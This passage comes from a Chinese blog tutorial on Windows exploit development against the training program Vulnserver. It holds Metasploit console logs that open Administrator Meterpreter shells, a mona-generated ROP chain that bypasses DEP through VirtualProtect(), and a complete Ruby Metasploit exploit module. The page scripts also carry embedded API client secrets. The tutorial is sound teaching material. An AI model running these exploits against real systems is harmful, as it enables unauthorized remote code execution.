class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
</li>
<li><p>exploit</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rport 80</span><br><span class="line">rport =&gt; 80</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
</li>
</ol>
<hr>
<h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote>
<p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p>
</blockquote>
<h2 id="设置DEP保护"><a href="#设置DEP保护" class="headerlink" title="设置DEP保护"></a>设置DEP保护</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png" alt><br><em>构建ROP链来调用VirtualProtect()关闭DEP并执行Shellcode</em></p>
<h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>&#39;TRUN .&#39;+make_nops(target[&#39;Offset&#39;])</code><br>Immunity附加进程之后在服务端发送3000个字符计算偏移</p>
<h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &amp;VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"></span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="comment"># Call the ROP chain generator inside the 'exploit' function :</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> rop_chain = create_rop_chain()</span><br></pre></td></tr></table></figure></p>
<h2 id="自动化攻击-2"><a href="#自动化攻击-2" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line"> Rank = NormalRanking</span><br><span class="line"> <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line"> <span class="keyword">super</span>(update_info(info,</span><br><span class="line"> <span class="string">'Name'</span> =&gt; <span class="string">'DEP Bypass Exploit'</span>,</span><br><span class="line"> <span class="string">'Description'</span> =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string"> DEP Bypass Using ROP Chains Example Module</span></span><br><span class="line"><span class="string"> &#125;</span>,</span><br><span class="line"> <span class="string">'Platform'</span> =&gt; <span class="string">'Windows'</span>,</span><br><span class="line"> <span class="string">'Author'</span> =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"> <span class="string">'Payload'</span> =&gt;</span><br><span class="line"> &#123;</span><br><span class="line"> <span class="string">'space'</span> =&gt; <span class="number">312</span>,</span><br><span class="line"> <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00"</span></span><br><span class="line"> &#125;,</span><br><span class="line"> <span class="string">'Targets'</span> =&gt;</span><br><span class="line"> [</span><br><span class="line"> [</span><br><span class="line"> <span class="string">'Windows XP'</span>,</span><br><span class="line"> &#123;<span class="string">'Offset'</span> =&gt; find it&#125;</span><br><span class="line"> ]</span><br><span class="line"> ],</span><br><span class="line"> <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-01-16'</span>))</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line"> <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line"> rop_gadgets =</span><br><span class="line"> [</span><br><span class="line"> <span class="number">0x77dabf34</span>, <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x6250609c</span>, <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77d1927f</span>, <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x7c96d192</span>, <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x77bef671</span>, <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x625011af</span>, <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line"> <span class="number">0x77e9ad22</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0xfffffdff</span>, <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line"> <span class="number">0x77e6c784</span>, <span class="comment"># NEG EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77dc560a</span>, <span class="comment"># XCHG EAX,EBX # RETN [ADVAPI32.dll]</span></span><br><span class="line"> <span class="number">0x7c87fbcb</span>, <span class="comment"># POP EAX # RETN [kernel32.dll]</span></span><br><span class="line"> <span class="number">0xffffffc0</span>, <span class="comment"># Value to negate, will become 0x00000040</span></span><br><span class="line"> <span class="number">0x77d4493b</span>, <span class="comment"># NEG EAX # RETN [USER32.dll]</span></span><br><span class="line"> <span class="number">0x77c28fbc</span>, <span class="comment"># XCHG EAX,EDX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x77bef7c9</span>, <span class="comment"># POP ECX # RETN [msvcrt.dll]</span></span><br><span class="line"> <span class="number">0x7c99bac1</span>, <span class="comment"># &amp;Writable location [ntdll.dll]</span></span><br><span class="line"> <span class="number">0x719e4870</span>, <span class="comment"># POP EDI # RETN [mswsock.dll]</span></span><br><span class="line"> <span class="number">0x77e6d224</span>, <span class="comment"># RETN (ROP NOP) [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x77e8c50c</span>, <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line"> <span class="number">0x90909090</span>, <span class="comment"># nop</span></span><br><span class="line"> <span class="number">0x77de60c7</span>, <span class="comment"># PUSHAD # RETN [ADVAPI32.dll]</span></span><br><span class="line"> ].flatten.pack(<span class="string">"V*"</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> rop_gadgets</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line"> connect</span><br><span class="line"> rop_chain = create_rop_chain()</span><br><span class="line"> junk = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line"> buf = <span class="string">"TRUN ."</span> + junk + rop_chain + make_nops(<span class="number">16</span>) + payload.encoded + <span class="string">'\r\n'</span></span><br><span class="line"> sock.put(buf)</span><br><span class="line"> handler</span><br><span class="line"> disconnect</span><br><span class="line"> <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/rop_attack</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/rop_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:44537 -&gt; 192.168.31.114:4444) at 2019-07-10 16:51:07 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
</div>
<div>
<div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
<div>您的支持将鼓励我继续创作!</div>
<button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
<span>打赏</span>
</button>
<div id="QR" style="display: none;">
<div id="wechat" style="display: inline-block">
<img id="wechat_qr" src="/images/Wechatpay.png" alt="Cool-Y 微信支付">
<p>微信支付</p>
</div>
<div id="alipay" style="display: inline-block">
<img id="alipay_qr" src="/images/Alipay.png" alt="Cool-Y 支付宝">
<p>支付宝</p>
</div>
</div>
</div>
</div>
<div>
<ul class="post-copyright">
<li class="post-copyright-author">
<strong>本文作者:</strong>
Cool-Y
</li>
<li class="post-copyright-link">
<strong>本文链接:</strong>
<a href="https://cool-y.github.io/2019/07/10/x86basic/" title="x86-basic 漏洞利用">https://cool-y.github.io/2019/07/10/x86basic/</a>
</li>
<li class="post-copyright-license">
<strong>版权声明: </strong>
本博客所有文章除特别声明外,均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处!
</li>
</ul>
</div>
<footer class="post-footer">
<div class="post-tags">
<a href="/tags/二进制/" rel="tag"># 二进制</a>
<a href="/tags/Windows/" rel="tag"># Windows</a>
<a href="/tags/漏洞/" rel="tag"># 漏洞</a>
</div>
<div class="post-widgets">
<div id="needsharebutton-postbottom">
<span class="btn">
<i class="fa fa-share-alt" aria-hidden="true"></i>
</span>
</div>
</div>
<div class="post-nav">
<div class="post-nav-next post-nav-item">
<a href="/2019/07/09/afl-first-try/" rel="next" title="AFL-爱之初体验">
<i class="fa fa-chevron-left"></i> AFL-爱之初体验
</a>
</div>
<span class="post-nav-divider"></span>
<div class="post-nav-prev post-nav-item">
<a href="/2019/07/16/linux-pwn-32/" rel="prev" title="Linux Pwn-缓冲区溢出利用">
Linux Pwn-缓冲区溢出利用 <i class="fa fa-chevron-right"></i>
</a>
</div>
</div>
</footer>
</div>
</article>
<div class="post-spread">
</div>
</div>
</div>
<div class="comments" id="comments">
<div id="gitalk-container"></div>
</div>
</div>
<div class="sidebar-toggle">
<div class="sidebar-toggle-line-wrap">
<span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
<span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
</div>
</div>
<aside id="sidebar" class="sidebar">
<div id="sidebar-dimmer"></div>
<div class="sidebar-inner">
<ul class="sidebar-nav motion-element">
<li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
文章目录
</li>
<li class="sidebar-nav-overview" data-target="site-overview-wrap">
站点概览
</li>
</ul>
<section class="site-overview-wrap sidebar-panel">
<div class="site-overview">
<div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
<img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Cool-Y">
<p class="site-author-name" itemprop="name">Cool-Y</p>
<p class="site-description motion-element" itemprop="description">Juice is temporary but Sauce is forever</p>
</div>
<nav class="site-state motion-element">
<div class="site-state-item site-state-posts">
<a href="/archives/">
<span class="site-state-item-count">31</span>
<span class="site-state-item-name">日志</span>
</a>
</div>
<div class="site-state-item site-state-categories">
<a href="/categories/index.html">
<span class="site-state-item-count">7</span>
<span class="site-state-item-name">分类</span>
</a>
</div>
<div class="site-state-item site-state-tags">
<a href="/tags/index.html">
<span class="site-state-item-count">55</span>
<span class="site-state-item-name">标签</span>
</a>
</div>
</nav>
<div class="feed-link motion-element">
<a href="/atom.xml" rel="alternate">
<i class="fa fa-rss"></i>
RSS
</a>
</div>
<div class="links-of-author motion-element">
<span class="links-of-author-item">
<a href="https://github.com/Cool-Y" target="_blank" title="GitHub">
<i class="fa fa-fw fa-github"></i>GitHub</a>
</span>
<span class="links-of-author-item">
<a href="mailto:cool.yim@whu.edu.cn" target="_blank" title="E-Mail">
<i class="fa fa-fw fa-envelope"></i>E-Mail</a>
</span>
<span class="links-of-author-item">
<a href="https://www.instagram.com/yan__han/" target="_blank" title="Instagram">
<i class="fa fa-fw fa-instagram"></i>Instagram</a>
</span>
</div>
<div id="music163player">
<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width="330" height="110" src="//music.163.com/outchain/player?type=4&id=334277093&auto=1&height=90"></iframe>
</div>
</div>
</section>
<!--noindex-->
<section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
<div class="post-toc">
<div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#0x00-漏洞利用开发简介"><span class="nav-text">0x00 漏洞利用开发简介</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x01-简单栈溢出"><span class="nav-text">0x01 简单栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#漏洞点"><span class="nav-text">漏洞点</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#关闭防御措施"><span class="nav-text">关闭防御措施</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#整体的攻击流程"><span class="nav-text">整体的攻击流程</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找jmp-esp跳板"><span class="nav-text">寻找jmp esp跳板</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x02-基于SEH的栈溢出"><span class="nav-text">0x02 基于SEH的栈溢出</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#确定溢出点的位置-1"><span class="nav-text">确定溢出点的位置</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#寻找PPR"><span class="nav-text">寻找PPR</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-1"><span class="nav-text">自动化攻击</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#0x03-绕过DEP"><span class="nav-text">0x03 绕过DEP</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#设置DEP保护"><span class="nav-text">设置DEP保护</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#计算偏移量"><span class="nav-text">计算偏移量</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#创建ROP链"><span class="nav-text">创建ROP链</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#自动化攻击-2"><span class="nav-text">自动化攻击</span></a></li></ol></li></ol></div>
</div>
</section>
<!--/noindex-->
</div>
</aside>
</div>
</main>
<footer id="footer" class="footer">
<div class="footer-inner">
<div class="copyright">&copy; 2019 &mdash; <span itemprop="copyrightYear">2021</span>
<span class="with-love">
<i class="fa fa-user"></i>
</span>
<span class="author" itemprop="copyrightHolder">Cool-Y</span>
<span class="post-meta-divider">|</span>
<span class="post-meta-item-icon">
<i class="fa fa-area-chart"></i>
</span>
<span title="Site words total count">105.1k</span>
</div>
<div class="powered-by"><a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
<div class="busuanzi-count">
<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<span class="site-uv">
<i class="fa fa-user"></i>
<span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
</span>
<span class="site-pv">
<i class="fa fa-eye"></i>
<span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
</span>
</div>
</div>
</footer>
<div class="back-to-top">
<i class="fa fa-arrow-up"></i>
<span id="scrollpercent"><span>0</span>%</span>
</div>
<div id="needsharebutton-float">
<span class="btn">
<i class="fa fa-share-alt" aria-hidden="true"></i>
</span>
</div>
</div>
<script type="text/javascript">
if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
window.Promise = null;
}
</script>
<script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
<script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
<script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
<script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
<script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>
<!-- LOCAL: You can save these files to your site and update links -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>
<!-- END LOCAL -->
<script type="text/javascript">
function renderGitalk(){
var gitalk = new Gitalk({
owner: 'Cool-Y',
repo: 'gitment-comments',
clientID: '180955a2c3ae3d966d9a',
clientSecret: '1c5db4da72df5e6fc318d12afe5f4406f7c54343',
admin: 'Cool-Y',
id: decodeURI(location.pathname),
distractionFreeMode: 'true'
});
gitalk.render('gitalk-container');
}
renderGitalk();
</script>
<script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script>AV.initialize("EWwoJgHNdlj6iBjiFlMcabUO-gzGzoHsz", "x8FxDrYG79C8YFrTww9ljo8K");</script>
<script>
function showTime(Counter) {
var query = new AV.Query(Counter);
var entries = [];
var $visitors = $(".leancloud_visitors");
$visitors.each(function () {
entries.push( $(this).attr("id").trim() );
});
query.containedIn('url', entries);
query.find()
.done(function (results) {
var COUNT_CONTAINER_REF = '.leancloud-visitors-count';
if (results.length === 0) {
$visitors.find(COUNT_CONTAINER_REF).text(0);
return;
}
for (var i = 0; i < results.length; i++) {
var item = results[i];
var url = item.get('url');
var time = item.get('time');
var element = document.getElementById(url);
$(element).find(COUNT_CONTAINER_REF).text(time);
}
for(var i = 0; i < entries.length; i++) {
var url = entries[i];
var element = document.getElementById(url);
var countSpan = $(element).find(COUNT_CONTAINER_REF);
if( countSpan.text() == '') {
countSpan.text(0);
}
}
})
.fail(function (object, error) {
console.log("Error: " + error.code + " " + error.message);
});
}
function addCount(Counter) {
var $visitors = $(".leancloud_visitors");
var url = $visitors.attr('id').trim();
var title = $visitors.attr('data-flag-title').trim();
var query = new AV.Query(Counter);
query.equalTo("url", url);
query.find({
success: function(results) {
if (results.length > 0) {
var counter = results[0];
counter.fetchWhenSave(true);
counter.increment("time");
counter.save(null, {
success: function(counter) {
var $element = $(document.getElementById(url));
$element.find('.leancloud-visitors-count').text(counter.get('time'));
},
error: function(counter, error) {
console.log('Failed to save Visitor num, with error message: ' + error.message);
}
});
} else {
var newcounter = new Counter();
/* Set ACL */
var acl = new AV.ACL();
acl.setPublicReadAccess(true);
acl.setPublicWriteAccess(true);
newcounter.setACL(acl);
/* End Set ACL */
newcounter.set("title", title);
newcounter.set("url", url);
newcounter.set("time", 1);
